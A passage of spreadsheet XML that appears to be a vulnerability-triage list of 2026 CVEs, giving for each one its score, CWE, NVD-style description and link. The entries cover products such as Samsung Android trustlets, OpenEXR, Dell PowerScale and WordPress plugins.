community.general Ansible collection. The shared OCAPI request helper disables
TLS certificate validation on every request and the modules expose no parameter
to re-enable it, while sending HTTP Basic-Auth credentials to an https endpoint.
An attacker positioned on the network path between the Ansible controller and the
OCAPI-managed storage/enclosure device can present any certificate, intercept the
session, capture the credentials, and tamper with responses.</t>
        </is>
      </c>
      <c r="S678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87872</t>
        </is>
      </c>
    </row>
    <row r="679">
      <c r="A679" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B679" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21085</t>
        </is>
      </c>
      <c r="D679" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E679" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F679" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G679" s="5" t="inlineStr"/>
      <c r="H679" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I679" s="5" t="inlineStr"/>
      <c r="J679" s="5" t="inlineStr"/>
      <c r="K679" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L679" s="5" t="inlineStr"/>
      <c r="M679" s="5" t="inlineStr"/>
      <c r="N679" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O679" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P679" s="5" t="inlineStr"/>
      <c r="Q679" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R679" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Keymaster trustlet prior to SMR Sep-2026 Release 1 allows local privileged attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21085</t>
        </is>
      </c>
    </row>
    <row r="680">
      <c r="A680" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B680" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21093</t>
        </is>
      </c>
      <c r="D680" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E680" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F680" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G680" s="5" t="inlineStr"/>
      <c r="H680" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I680" s="5" t="inlineStr"/>
      <c r="J680" s="5" t="inlineStr"/>
      <c r="K680" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L680" s="5" t="inlineStr"/>
      <c r="M680" s="5" t="inlineStr"/>
      <c r="N680" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O680" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P680" s="5" t="inlineStr"/>
      <c r="Q680" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R680" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in PROCA trustlet prior to SMR Sep-2026 Release 1 allows local privileged attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21093</t>
        </is>
      </c>
    </row>
    <row r="681">
      <c r="A681" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B681" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21097</t>
        </is>
      </c>
      <c r="D681" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E681" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F681" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G681" s="5" t="inlineStr"/>
      <c r="H681" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I681" s="5" t="inlineStr"/>
      <c r="J681" s="5" t="inlineStr"/>
      <c r="K681" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L681" s="5" t="inlineStr"/>
      <c r="M681" s="5" t="inlineStr"/>
      <c r="N681" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O681" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P681" s="5" t="inlineStr"/>
      <c r="Q681" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R681" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in ActivityTaskManagerService prior to SMR Sep-2026 Release 1 allows local privileged attackers to launch arbitrary activity.</t>
        </is>
      </c>
      <c r="S681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21097</t>
        </is>
      </c>
    </row>
    <row r="682">
      <c r="A682" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B682" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21101</t>
        </is>
      </c>
      <c r="D682" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E682" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F682" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G682" s="5" t="inlineStr"/>
      <c r="H682" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I682" s="5" t="inlineStr"/>
      <c r="J682" s="5" t="inlineStr"/>
      <c r="K682" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L682" s="5" t="inlineStr"/>
      <c r="M682" s="5" t="inlineStr"/>
      <c r="N682" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O682" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P682" s="5" t="inlineStr"/>
      <c r="Q682" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R682" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in DualDAR driver prior to SMR Sep-2026 Release 1 allows local privileged attackers to potentially execute arbitrary code with root privilege.</t>
        </is>
      </c>
      <c r="S682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21101</t>
        </is>
      </c>
    </row>
    <row r="683">
      <c r="A683" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B683" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21102</t>
        </is>
      </c>
      <c r="D683" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E683" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F683" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G683" s="5" t="inlineStr"/>
      <c r="H683" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I683" s="5" t="inlineStr"/>
      <c r="J683" s="5" t="inlineStr"/>
      <c r="K683" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L683" s="5" t="inlineStr"/>
      <c r="M683" s="5" t="inlineStr"/>
      <c r="N683" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O683" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P683" s="5" t="inlineStr"/>
      <c r="Q683" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R683" s="5" t="inlineStr">
        <is>
          <t>Use after free in DualDAR prior to SMR Sep-2026 Release 1 allows local privileged attackers to execute arbitrary code with root privilege.</t>
        </is>
      </c>
      <c r="S683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21102</t>
        </is>
      </c>
    </row>
    <row r="684">
      <c r="A684" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B684" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21104</t>
        </is>
      </c>
      <c r="D684" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E684" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F684" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G684" s="5" t="inlineStr"/>
      <c r="H684" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I684" s="5" t="inlineStr"/>
      <c r="J684" s="5" t="inlineStr"/>
      <c r="K684" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L684" s="5" t="inlineStr"/>
      <c r="M684" s="5" t="inlineStr"/>
      <c r="N684" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O684" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P684" s="5" t="inlineStr"/>
      <c r="Q684" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R684" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in KnoxVault trustlet prior to SMR Sep-2026 Release 1 allows local privileged attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="S684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21104</t>
        </is>
      </c>
    </row>
    <row r="685">
      <c r="A685" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B685" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65979</t>
        </is>
      </c>
      <c r="D685" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E685" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F685" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G685" s="5" t="inlineStr"/>
      <c r="H685" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I685" s="5" t="inlineStr"/>
      <c r="J685" s="5" t="inlineStr"/>
      <c r="K685" s="5" t="inlineStr"/>
      <c r="L685" s="5" t="inlineStr"/>
      <c r="M685" s="5" t="inlineStr"/>
      <c r="N685" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O685" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P685" s="5" t="inlineStr"/>
      <c r="Q685" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="R685" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. From version 3.4.0 through 3.4.12, the HTJ2K decoder parses a header-length field (PLEN) from a chunk's compressed data but never checks that this value fits within the available buffer before using it. When decoding, it advances the codestream pointer by the attacker-supplied header size and passes the resulting offset and remaining length to the OpenJPH memory-input path, so a crafted value pushes the pointer past the end of the buffer and causes an out-of-bounds read. Because this field comes straight from attacker-controlled EXR chunk data, the flaw is reachable during normal decoding of an untrusted file. This issue is fixed in version 3.4.13.</t>
        </is>
      </c>
      <c r="S685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65979</t>
        </is>
      </c>
    </row>
    <row r="686">
      <c r="A686" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B686" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70425</t>
        </is>
      </c>
      <c r="D686" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E686" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F686" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G686" s="5" t="inlineStr"/>
      <c r="H686" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I686" s="5" t="inlineStr"/>
      <c r="J686" s="5" t="inlineStr"/>
      <c r="K686" s="5" t="inlineStr">
        <is>
          <t>dell:powerscale_onefs</t>
        </is>
      </c>
      <c r="L686" s="5" t="inlineStr"/>
      <c r="M686" s="5" t="inlineStr"/>
      <c r="N686" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O686" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P686" s="5" t="inlineStr"/>
      <c r="Q686" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R686" s="5" t="inlineStr">
        <is>
          <t>Dell PowerScale OneFS, Versions 9.5.0.0 through 9.7.1.0, Versions 9.8.0.0 through 9.10.1.0, and Versions 9.11.0.0 through 9.14.0.1, contain a command injection vulnerability. An admin privileged local attacker could potentially exploit this vulnerability, leading to elevation of privileges to root, impacting confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="S686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70425</t>
        </is>
      </c>
    </row>
    <row r="687">
      <c r="A687" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B687" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11363</t>
        </is>
      </c>
      <c r="D687" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E687" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F687" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G687" s="5" t="inlineStr"/>
      <c r="H687" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I687" s="5" t="inlineStr"/>
      <c r="J687" s="5" t="inlineStr"/>
      <c r="K687" s="5" t="inlineStr"/>
      <c r="L687" s="5" t="inlineStr"/>
      <c r="M687" s="5" t="inlineStr"/>
      <c r="N687" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O687" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P687" s="5" t="inlineStr"/>
      <c r="Q687" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R687" s="5" t="inlineStr">
        <is>
          <t>The Ninja Forms – The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.6 via deserialization of untrusted input . This makes it possible for authenticated attackers, with administrator-level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 The deserialization is triggered automatically during form import when WPN_Helper::build_nf_cache() invokes $action-&gt;get_settings() immediately after the crafted form is imported, requiring no further interaction beyond the import action itself.</t>
        </is>
      </c>
      <c r="S687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11363</t>
        </is>
      </c>
    </row>
    <row r="688">
      <c r="A688" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B688" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14505</t>
        </is>
      </c>
      <c r="D688" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E688" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F688" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G688" s="5" t="inlineStr"/>
      <c r="H688" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I688" s="5" t="inlineStr"/>
      <c r="J688" s="5" t="inlineStr"/>
      <c r="K688" s="5" t="inlineStr"/>
      <c r="L688" s="5" t="inlineStr"/>
      <c r="M688" s="5" t="inlineStr"/>
      <c r="N688" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O688" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P688" s="5" t="inlineStr"/>
      <c r="Q688" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R688" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a path traversal vulnerability in Tanium Data Service.</t>
        </is>
      </c>
      <c r="S688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14505</t>
        </is>
      </c>
    </row>
    <row r="689">
      <c r="A689" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B689" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19201</t>
        </is>
      </c>
      <c r="D689" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E689" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F689" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@google.com</t>
        </is>
      </c>
      <c r="G689" s="5" t="inlineStr"/>
      <c r="H689" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I689" s="5" t="inlineStr"/>
      <c r="J689" s="5" t="inlineStr"/>
      <c r="K689" s="5" t="inlineStr"/>
      <c r="L689" s="5" t="inlineStr"/>
      <c r="M689" s="5" t="inlineStr"/>
      <c r="N689" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O689" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P689" s="5" t="inlineStr"/>
      <c r="Q689" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="R689" s="5" t="inlineStr">
        <is>
          <t>An uncontrolled recursion vulnerability in the Windows SIPA event log parser of Google go-attestation versions up to and including 0.6.1 allows an attacker to cause a denial of service (DoS). The (*WinEvents).readELAMAggregation function recurses for every nested elamAggregation sub-event without enforcing a maximum recursion depth limit, while the size guard is bypassed on recursive execution paths. By submitting a crafted Windows event log containing deeply nested elamAggregation headers, an attacker can exhaust the goroutine call stack, triggering an unrecoverable fatal runtime error (stack overflow) that immediately crashes the verifier application.</t>
        </is>
      </c>
      <c r="S689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19201</t>
        </is>
      </c>
    </row>
    <row r="690">
      <c r="A690" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B690" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55569</t>
        </is>
      </c>
      <c r="D690" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E690" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F690" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G690" s="5" t="inlineStr"/>
      <c r="H690" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I690" s="5" t="inlineStr"/>
      <c r="J690" s="5" t="inlineStr"/>
      <c r="K690" s="5" t="inlineStr"/>
      <c r="L690" s="5" t="inlineStr"/>
      <c r="M690" s="5" t="inlineStr"/>
      <c r="N690" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O690" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P690" s="5" t="inlineStr"/>
      <c r="Q690" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="R690" s="5" t="inlineStr">
        <is>
          <t>aqua is a declarative command-line version manager written in Go. Prior to 2.60.1, pkg/unarchive/archives.go in the handler.HandleFile method calls os.Symlink with archives.FileInfo.LinkTarget without verifying that the target remains under the extraction destination. A later regular-file entry at the same archive path is opened with OpenFile using O_CREATE and O_WRONLY, which follows the attacker-planted symlink. A malicious or compromised package archive can therefore write attacker-controlled bytes outside aqua's extraction directory with the privileges of the user running aqua, potentially overwriting shell startup files, tool configuration, or writable executable paths. This issue is fixed in version 2.60.1.</t>
        </is>
      </c>
      <c r="S690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55569</t>
        </is>
      </c>
    </row>
    <row r="691">
      <c r="A691" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B691" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C691" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54392</t>
        </is>
      </c>
      <c r="D691" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E691" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F691" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G691" s="5" t="inlineStr"/>
      <c r="H691" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I691" s="5" t="inlineStr"/>
      <c r="J691" s="5" t="inlineStr"/>
      <c r="K691" s="5" t="inlineStr"/>
      <c r="L691" s="5" t="inlineStr"/>
      <c r="M691" s="5" t="inlineStr"/>
      <c r="N691" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O691" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P691" s="5" t="inlineStr"/>
      <c r="Q691" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R691" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions &gt;= 4.20.0 before 4.22.3 (and before 5.2.1 in the 5.x branch) fail to validate NBT tag types in BlockActorDataPacket. A player can crash the server by sending a packet containing sign NBT data with an incorrect tag type, triggering an unhandled UnexpectedTagTypeException that terminates the server process.</t>
        </is>
      </c>
      <c r="S691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54392</t>
        </is>
      </c>
    </row>
    <row r="692">
      <c r="A692" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B692" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C692" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58380</t>
        </is>
      </c>
      <c r="D692" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E692" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F692" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G692" s="5" t="inlineStr"/>
      <c r="H692" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I692" s="5" t="inlineStr"/>
      <c r="J692" s="5" t="inlineStr"/>
      <c r="K692" s="5" t="inlineStr"/>
      <c r="L692" s="5" t="inlineStr"/>
      <c r="M692" s="5" t="inlineStr"/>
      <c r="N692" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O692" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P692" s="5" t="inlineStr"/>
      <c r="Q692" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R692" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.11.2 contain a denial of service vulnerability in BookEditPacket handling that crashes the server when an invalid inventory slot value is provided. Attackers can send a crafted BookEditPacket with an inventory slot greater than 35 to trigger an unhandled exception and crash the server.</t>
        </is>
      </c>
      <c r="S692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58380</t>
        </is>
      </c>
    </row>
    <row r="693">
      <c r="A693" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B693" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C693" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70340</t>
        </is>
      </c>
      <c r="D693" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E693" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F693" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G693" s="5" t="inlineStr"/>
      <c r="H693" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I693" s="5" t="inlineStr"/>
      <c r="J693" s="5" t="inlineStr"/>
      <c r="K693" s="5" t="inlineStr"/>
      <c r="L693" s="5" t="inlineStr"/>
      <c r="M693" s="5" t="inlineStr"/>
      <c r="N693" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O693" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P693" s="5" t="inlineStr"/>
      <c r="Q693" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R693" s="5" t="inlineStr">
        <is>
          <t>A Broken Access Control vulnerability exists in ThingsBoard Professional Edition (PE) 4.21 and below, within the Alarms comments functionality. An authenticated customer user can manipulate the respective API request parameters to create or modify system-generated alarm comments. This allows unauthorized impersonation of system messages and modification of trusted system-owned data, resulting in vertical privilege escalation and potential integrity violations.</t>
        </is>
      </c>
      <c r="S693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70340</t>
        </is>
      </c>
    </row>
    <row r="694">
      <c r="A694" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B694" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17443</t>
        </is>
      </c>
      <c r="D694" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E694" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F694" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G694" s="5" t="inlineStr"/>
      <c r="H694" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I694" s="5" t="inlineStr"/>
      <c r="J694" s="5" t="inlineStr"/>
      <c r="K694" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="L694" s="5" t="inlineStr"/>
      <c r="M694" s="5" t="inlineStr"/>
      <c r="N694" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O694" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P694" s="5" t="inlineStr"/>
      <c r="Q694" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R694" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a remote authenticated attacker to obtain sensitive information due to an XML external entity (XXE) injection flaw.</t>
        </is>
      </c>
      <c r="S694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17443</t>
        </is>
      </c>
    </row>
    <row r="695">
      <c r="A695" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B695" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17622</t>
        </is>
      </c>
      <c r="D695" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E695" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F695" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G695" s="5" t="inlineStr"/>
      <c r="H695" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I695" s="5" t="inlineStr"/>
      <c r="J695" s="5" t="inlineStr"/>
      <c r="K695" s="5" t="inlineStr">
        <is>
